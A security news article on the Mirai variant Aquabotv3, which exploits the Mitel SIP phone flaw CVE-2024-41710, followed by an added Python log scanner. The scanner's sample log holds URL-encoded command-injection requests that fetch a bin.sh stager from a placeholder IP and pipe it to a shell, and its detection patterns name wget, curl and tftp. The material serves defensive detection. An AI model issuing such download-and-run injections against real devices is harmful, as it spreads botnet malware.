Mirai Variant Aquabot Exploits Mitel Device Flaws


The infamous Mirai botnet is once again causing chaos, this time through a new variant known as Aquabot. This latest iteration is particularly dangerous because it is sold as distributed denial-of-service (DDoS) as-a-service and spreads by targeting vulnerabilities in Mitel SIP phones. What sets this variant apart is its ability to report back to attacker command-and-control (C2) infrastructure.

According to researchers at the Akamai Security Intelligence and Response Team (SIRT), Aquabot exploits a command-injection vulnerability identified as CVE-2024-41710. This flaw affects several Mitel phone models commonly used in corporate environments. The vulnerability stems from an input sanitization issue that allows attackers to gain root access to the device. The researchers, Kyle Lefton and Larry Cashdollar, detailed their findings in a blog post published on January 29.

Aquabotv3, as Akamai refers to this variant, is the third version of the botnet to emerge. The initial version was discovered in November 2023, built on the Mirai framework with a focus on launching DDoS attacks. The second version added concealment and persistence mechanisms, such as preventing device shutdown and restart, a feature that remains present in the current version.

One of the distinguishing features of Aquabotv3 is a function named “report_kill” that informs the C2 when a kill signal is detected on the infected device. Despite this capability, researchers have not observed any response to this function from the attacker’s command-and-control infrastructure.

Additionally, Aquabotv3 has been advertised as a DDoS-as-a-service offering on platforms like Telegram under different names like Cursinq Firewall, The Eye Services, and The Eye Botnet. These aliases promote services for both Layer 4 and Layer 7 DDoS attacks.

Akamai SIRT uncovered active exploit attempts targeting CVE-2024-41710 through its global network of honeypots in early January. These attempts closely resembled a proof-of-concept released on GitHub by Packetlabs researcher Kyle Burns. The exploits aim to execute a shell script called bin.sh, which then fetches and runs Mirai malware on the compromised system.

Despite efforts to disguise the activity as DDoS testing, threat actors behind Aquabot are actively spreading Mirai malware. The researchers emphasized the importance of securing IoT devices against DDoS threats, as many of these botnets exploit common password libraries. They advised organizations to change default credentials to protect against such attacks.

As Mirai botnets continue to pose a significant threat, organizations must take proactive steps to secure IoT devices and prevent DDoS attacks. By implementing stronger authentication measures and monitoring for indicators of compromise, defenders can mitigate the risk posed by these malicious botnets. Akamai SIRT provided a list of indicators of compromise and rules to assist defenders in identifying and stopping potential threats.
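The honeypot observations above (a command-injection request that pulls down a bin.sh stager) and the advice to monitor for indicators of compromise can be turned into a simple log check. The following is an added example, not code from Akamai or the article; the log format, request paths and IP addresses are constructed placeholders, since the article does not name the vulnerable Mitel endpoint.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample HTTP access-log lines (combined-log style). The request
# paths are placeholders: the article does not name the vulnerable endpoint.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2025:08:01:12 +0000] "POST /provisioning/set HTTP/1.1" 200 512 "-" "curl/8.0"
198.51.100.7 - - [10/Jan/2025:08:03:44 +0000] "POST /provisioning/set?name=x%3B%20wget%20http%3A%2F%2F203.0.113.9%2Fbin.sh%20-O%20%2Ftmp%2Fbin.sh%3B%20sh%20%2Ftmp%2Fbin.sh HTTP/1.1" 200 20 "-" "-"
192.0.2.3 - - [10/Jan/2025:08:05:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.22 - - [10/Jan/2025:08:07:19 +0000] "GET /cgi-bin/status?host=127.0.0.1%60curl%20-s%20203.0.113.9%2Fbin.sh%7Csh%60 HTTP/1.1" 500 0 "-" "-"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
SHELL_META = re.compile(r'[;|&`]|\$\(')               # command separators
FETCHER = re.compile(r'\b(wget|curl|tftp|ftpget)\b')  # download-and-run utilities
STAGER = re.compile(r'\bbin\.sh\b')                   # stager name from the report

def classify_request(path: str) -> list[str]:
    """Return the reasons a decoded request path looks like a Mirai-style
    command-injection attempt; an empty list means nothing suspicious."""
    decoded = unquote_plus(path)
    reasons = []
    if SHELL_META.search(decoded):
        reasons.append("shell metacharacter in parameter")
    if FETCHER.search(decoded):
        reasons.append("remote fetch utility in parameter")
    if STAGER.search(decoded):
        reasons.append("bin.sh stager referenced")
    # Metacharacters alone are noisy; require a second signal before alerting.
    return reasons if len(reasons) >= 2 else []

def scan_log(text: str) -> list[dict]:
    """Parse access-log lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path = m.groups()
        reasons = classify_request(path)
        if reasons:
            findings.append({"ip": ip, "time": ts, "method": method,
                             "path": unquote_plus(path), "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["method"], f["path"], f["reasons"])
```

Run against real device or reverse-proxy logs, the flagged source addresses are candidates to compare with the Akamai SIRT indicator list.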
